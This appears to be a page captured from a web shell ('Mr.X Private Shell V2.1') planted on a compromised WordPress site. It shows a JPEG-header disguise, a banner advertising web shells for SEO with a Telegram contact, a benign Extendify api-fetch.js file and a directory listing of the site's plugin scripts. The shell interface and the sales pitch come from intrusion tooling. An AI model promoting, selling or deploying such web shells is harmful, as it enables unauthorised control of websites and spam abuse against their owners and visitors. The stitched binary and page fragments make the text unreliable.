����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import apiFetch from '@wordpress/api-fetch';
// wp/v2 or extendify/v1
const API_NAMESPACE_RE = /^(?:\/)?(?:wp|extendify)\/v\d+(?:\/|$|\?)/i;
apiFetch.use((options, next) => {
if (!API_NAMESPACE_RE.test(options.path)) {
return next(options);
}
return next({
...options,
headers: { ...options?.headers, 'X-Extendify': 'true' },
});
});
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| api-fetch.js | File | 346 B | 0644 |
|
| data.js | File | 341 B | 0644 |
|
| dom.js | File | 254 B | 0644 |
|
| embedded-guard.js | File | 669 B | 0644 |
|
| media-views.js | File | 1.97 KB | 0644 |
|
| pages.js | File | 16.27 KB | 0644 |
|
| parsing.js | File | 206 B | 0644 |
|
| track.js | File | 713 B | 0644 |
|
| unsplash.js | File | 1.93 KB | 0644 |
|
| utils.js | File | 1.72 KB | 0644 |
|
| variant-classes.js | File | 4.72 KB | 0644 |
|
| wp.js | File | 499 B | 0644 |
|